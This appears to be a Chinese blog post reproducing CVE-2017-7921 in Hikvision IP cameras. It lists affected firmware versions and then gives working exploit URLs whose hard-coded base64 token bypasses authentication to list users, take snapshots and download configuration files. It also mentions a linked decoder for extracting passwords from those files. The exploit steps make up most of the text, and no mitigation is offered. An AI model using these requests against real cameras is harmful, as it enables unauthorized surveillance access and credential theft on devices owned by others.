海康威视CVE-2017-7921
海康威视CVE-2017-7921
漏洞概述
通过构造url进行检索所有用户、屏幕截图、配置文件下载
漏洞危害等级:中危
影响版本
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
版本至5.4.0build160530版本;
DS-2CD2xx0F-ISeries5.2.0build140721
版本至5.4.0Build160401版本;
DS-2CD2xx2FWDSeries5.3.1build150410
版本至5.4.4Build161125版本;
DS-2CD4x2xFWDSeries5.2.0build140721
版本至5.4.0Build160414版本;
DS-2CD4xx5Series5.2.0build140721
版本至5.4.0Build160421版本;
DS-2DFxSeries5.2.0build140805
版本至5.4.5Build160928版本;
DS-2CD63xxSeries5.0.9build140305
版本至5.3.5Build160106版本
监控查看环境
组件 | 版本 |
---|---|
os | win7 |
web | IE |
漏洞复现
命令:
IP/Security/users?auth=YWRtaW46MTEK
检索所有用户
IP/onvif-http/snapshot?auth=YWRtaW46MTEK
获取镜头快照而不进行身份验证
IP/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头二进制配置文件
上述内容中的简单解释:
YWRtaW46MTEK
admin:11的base64编码
onvif-http/snapshot
协议截图指令
信息提取
得到二进制配置文件:configurationFile
配置文件解码器可以提取关键密码
相关工具快捷通道:https://download.csdn.net/download/qq_46527139/13655171
海康威视CVE-2017-7921相关推荐
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- php cve 2017 12933,18-017 (March 27, 2018)
描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...
- 2021年第一季度Sumap网络空间测绘CVE漏洞趋势安全分析报告
前言 本文主要通过网络测绘角度收集各种资产协议的版本号信息,通过比对CVE漏洞影响范围中的版本号方式,进行安全风险趋势分析,无任何实际危害互联网行为.资产在携带版本中也会存在修复补丁后版本不变的情况. ...
- Nginx平滑升级到最新版本
(一)简述: 早上收到nginx最新漏洞的通知,Nginx官方发布最新的安全公告,在Nginx范围过滤器中发现了一个安全问题(CVE-2017-7529),通过精心构造的恶意请求可能会导致整数溢出并且 ...
- VMware vCenter Server Appliance Photon OS安全修补程序
VMware vCenter Server Appliance Photon OS安全修补程序 上次更新时间 2019年12月19日 https://docs.vmware.com/en/VMware ...
- 工控系统的全球安全现状:全球漏洞实例分析
工控系统的全球安全现状:全球漏洞实例分析 一.摘要 运营技术(OT).网络和设备,即工业环境中使用的所有组件,在设计时并未考虑到安全性.效率和易用性是最重要的设计特征,然而,由于工业的数字化,越来 ...
- 股票深度分析,深度诊断股票
深度学习做股票预测靠谱吗 . 靠谱,但是前提是你所学习的技术分析筹码分析知识是正确的那些,而不是买书买教材或者网上找资料学到的那些,比如kdj指标,无论你在哪本书或者网上找的资料都会告诉你80以上死叉 ...
- 宏观视角下的office漏洞(2010-2018)
奇技指南 本文作者银雁冰:360高级威胁应对团队·高级威胁自动化组 本文来自安全客,原文地址: https://www.anquanke.com/post/id/180067 前 言 本文是对我在B ...
- 海康威视2017校园秋季招聘技术支持工程师面试经验
面试单位:杭州海康威视数字技术股份有限公司 面试岗位:技术支持工程师 面试时间:2017年10月22日下午 面试地点:本校 面试过程: 先询问了我一些基本的家庭状况,算是缓和下面试的气氛. 紧接着开始 ...
- 海康威视2017软件精英挑战赛初赛题目
题目概述 在车库中安排若干泊车机器人,根据给定的车位地图,合理优化机器人的数量及其运动路径,尽量减少客户在停车和取车中的等待时间,并使总成本最小.(试题用例包于5月初开放下载) 参数设定 为了简化问题 ...
最新文章
- LINUX 操作记录到syslog,并发送到syslog服务器上
- RESTful API 设计指南[转]
- 计算机组成加速比例题,计算机体系结构大题预测
- linux终端输出图形_Linux进程关系
- 节点本地范围和链路本地范围_微服务链路追踪——skywalking
- java代码抖音舞,java实现抖音代码舞源码
- 为什么CSDN登陆是明文传输账户密码
- abb的knx的数据库下载方法_ABB i-bus KNX系统节能方案
- ubuntu安装deep-wine下载qq,tim等文件
- 《大型网站技术架构:核心原理与案例分析李智慧》pdf版电子书网盘附下载链接+仪式感技术书阅读法
- android tf卡 修复工具,sd卡修复工具大师
- 笔记本计算机bios设置,教你笔记本电脑如何进入bios界面
- 我的2023届秋招之旅
- 一个函数能否被两个线程同时调用
- 热敏打印机数据截取+追加打印二维码
- 用JAVA awt实现Image Asset Studio生成圆形或圆角矩形图片功能
- 戴尔服务器T30不读硬盘,【戴尔 POWEREDGE T30服务器开箱展示】硬盘|散热|机箱|内存_摘要频道_什么值得买...
- 酒水行业数字化转型解决方案
- jav阶段性总结(-5)
- PIC单片机开发环境搭建_MPLAB X IDE安装步骤
热门文章
- studio gradle中 Read timed out
- 程序员通病腰肌劳损,快速有效疗法--凳子小燕飞
- td340服务器网页,thinkserver TD340服务器系统用户手册V1.0_5分享文库
- IBM Cloud Classic VSI Storage性能测试
- 水泥cement英语里也写作caement
- 中国蚁剑AntSword
- oracle oui gi是什么,【翻译自mos文章】在windows 2012上安装rac时,GI 的安装失败,报OUI-35024...
- SCOM 简单安装指南 [SCOM中文系列之二]
- 【声明】RUC自习助手APP(Android版)已上线,可下载
- Android 7.0 OTA升级(高通)